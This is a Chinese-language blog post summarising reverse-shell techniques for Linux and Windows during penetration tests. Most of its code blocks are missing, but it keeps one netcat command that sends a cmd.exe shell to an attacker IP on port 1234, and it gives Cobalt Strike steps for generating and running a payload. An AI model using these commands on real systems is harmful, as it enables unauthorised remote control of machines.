欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

反弹shell的几种姿势小结

程序员文章站 2022-07-30 11:51:11
目录linux 反弹shellwindows反弹shell在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。反弹shell是打开内网...

在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。

反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。所有姿势整理自网络,假设,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。

linux 反弹shell

姿势一:bash反弹

在线编码地址:

其他版本:

姿势二:nc反弹

姿势三:awk反弹

姿势四:telnet反弹

备注:需要在攻击主机上分别监听1234和4321端口,执行反弹shell命令后,在1234终端输入命令,4321查看命令执行后的结果。

姿势五:socat反弹

姿势六:python反弹

姿势七:php反弹

姿势八:perl反弹

姿势九:ruby反弹

姿势十:lua反弹

姿势十一:java反弹

保存为revs.java文件,编译执行,成功反弹shell。

 windows反弹shell

姿势一:nc反弹

netcat 下载:

服务端反弹:nc 192.168.99.242 1234 -e c:\windows\system32\cmd.exe

姿势二:powershell反弹

powercat是netcat的powershell版本,功能免杀性都要比netcat好用的多。

下载到目标机器本地执行:

姿势三:msf反弹shell

使用msfvenom生成相关payload

姿势四:cobalt strike反弹shell

1、配置监听器:点击cobalt strike——>listeners——>在下方tab菜单listeners,点击add。
2、生成payload:点击attacks——>packages——>windows executable,保存文件位置。
3、目标机执行powershell payload

姿势五:empire反弹shell

姿势六:nishang反弹shell

reverse tcp shell:

reverse udp shell:

姿势七:dnscat反弹shell

github项目地址:


服务端:

目标主机:

到此这篇关于反弹shell的几种姿势小结的文章就介绍到这了,更多相关反弹shell内容请搜索以前的文章或继续浏览下面的相关文章希望大家以后多多支持!

相关标签: 反弹 shell